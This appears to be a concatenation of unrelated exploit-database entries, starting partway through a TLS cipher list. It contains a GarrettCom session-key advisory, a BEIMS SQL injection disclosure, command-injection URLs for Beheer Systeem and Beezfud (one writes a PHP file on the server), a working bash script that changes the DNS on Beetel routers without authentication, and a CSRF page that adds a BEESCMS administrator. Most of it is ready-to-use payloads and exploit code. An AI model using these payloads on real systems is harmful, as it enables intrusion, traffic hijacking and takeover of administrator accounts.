tls1: RC4-SHA
tls1: RC4-MD5
tls1: DES-CBC-SHA
tls1_1: AES256-SHA
tls1_1: CAMELLIA256-SHA
tls1_1: DES-CBC3-SHA
tls1_1: AES128-SHA
tls1_1: SEED-SHA
tls1_1: CAMELLIA128-SHA
tls1_1: RC4-SHA
tls1_1: RC4-MD5
tls1_1: DES-CBC-SHA
tls1_2: AES256-GCM-SHA384
tls1_2: AES256-SHA256
tls1_2: AES256-SHA
tls1_2: CAMELLIA256-SHA
tls1_2: DES-CBC3-SHA
tls1_2: AES128-GCM-SHA256
tls1_2: AES128-SHA256
tls1_2: AES128-SHA
tls1_2: SEED-SHA
tls1_2: CAMELLIA128-SHA
tls1_2: RC4-SHA
tls1_2: RC4-MD5
tls1_2: DES-CBC-SHA
GarrettCom-06 - Weak HTTP session key generation
------------------------------------------------
Severity: **Moderate**
The HTTP session key generation is predictable due to the lack of
randomness in the generation process. The key is generated by hashing the
previous hash result with the current time unit with precision around 50 unit
per second. The previous hash is replaced with a fixed salt for the first hash
generation.
The vulnerability allows an attacker to predict the first key that’s
generated by the switch if he has some knowledge about when the key was generated.
Alternatively, the vulnerability also enables privilege escalation attacks
which predict all future keys by observing two consecutive key generations of
lower privileges.
Timeline
--------
2017/01/?? - Issues Discovered
2017/01/27 - Reported to BEL-SM-PSIRT@belden.com
2017/04/27 - 90 day timeline expires, Belden reports patched release forthcoming.
2017/05/08 - Belden releases update & advisory.
2017/05/15 - Disclosure published
Discovery
---------
These issues were discovered by Andrew Griffiths, David Tomaschik, and
Xiaoran Wang of the Google Security Assessments Team.
# Exploit Title: SQL Injection
# Date: 18 December, 2017
# Exploit Author: Rajwinder Singh
# Vendor Homepage: http://www.beims.com/products/
# Software Link: http://www.beims.com/optional-modules/#ccw
# Version: BEIMS ContractorWeb .NET System 5.18.0.0
# CVE : 2017-17721
Vulnerability Details:
======================
WEBNET/WOSummary/List in ZUUSE BEIMS ContractorWeb .NET 5.18.0.0 allows SQL injection via the tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, or workorderstatus parameter.
Impact:
======================
1. Database compromise
2. Server compromise
3. Application defacement
4. Internal network access and exploitation.
Proof-of-Concept:
====================
1. Injected SQL injection payload under page "/CWEBNET/WOSummary/List" in post parameter 'tradestatus' and received SQL error response from server.
2. Saved request in the text file to run automated SQLmap tool for further enumeration and successfully dumped full database which will not be disclosed.
Affected Component:
====================
URL: www.domain.com/CWEBNET/WOSummary/List
post parameters: tradestatus, assetno, assignto, building, domain, jobtype, site, trade, woType, workorderno, workorderstatus
Disclosure Timeline:
=====================
Mitre Notification: 18 December, 2017
Public Disclosure: 18 December, 2017
Exploitation Technique:
=======================
Remote
Severity Level:
================
Critical
Description:
=====================================================
Request Method(s): [+] POST
Vulnerable Product: [+] BEIMS ContractorWeb .NET System 5.18.0.0
Reference: https://becomepentester.blogspot.ae/2017/12/ZUUSE-BEIMS-ContractorWeb-SQLInjection-CVE-2017-17721.html
source: https://www.securityfocus.com/bid/66489/info
Beheer Systeem is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
Beheer Systeem 6.1 is vulnerable; other versions may also be affected.
http://www.example.com/!/pbs.cgi?download=;id|
================================================================================
# Beezfud Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/EVA-01/beezfud
# Date: 23/12/2015
# Software Link: https://github.com/EVA-01/beezfud/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/beezfud-exec.txt
================================================================================
# Vulnerable File : index.php
# PoC :
http://localhost/beezfud/index.php?parameter=;Command;
Vulnerable Parameters : lookback , max , range , latest , earliest
Example :
http://localhost/beezfud/index.php?lookback=;echo '<?php phpinfo();
?>' >info.php;
================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
#!/bin/bash
#
# Beetel BCM96338 ADSL Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Beetel BCM96338 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
# Exploit Title: A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
# Date: 2018-06-25
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9226389.html
# Software Link: http://www.beescms.com/
# Version: BEESCMS - V4.0
# CVE : CVE-2018-12739
A CSRF vulnerability exists in BEESCMS_V4.0: The administrator can be added arbitrarily.
The payload for attack is as follows.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.211.55.17/beescms/admin/admin_admin.php?nav=list_admin_user&admin_p_nav=user" method="POST" enctype="multipart/form-data">
<input type="hidden" name="admin_name" value="test1" />
<input type="hidden" name="admin_password" value="test1" />
<input type="hidden" name="admin_password2" value="test1" />
<input type="hidden" name="admin_nich" value="test1" />
<input type="hidden" name="purview" value="1" />
<input type="hidden" name="admin_admin" value="" />
<input type="hidden" name="admin_mail" value="" />
<input type="hidden" name="admin_tel" value="" />
<input type="hidden" name="is_disable" value="0" />
<input type="hidden" name="action" value="save_admin" />
<input type="hidden" name="submit" value="确定" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>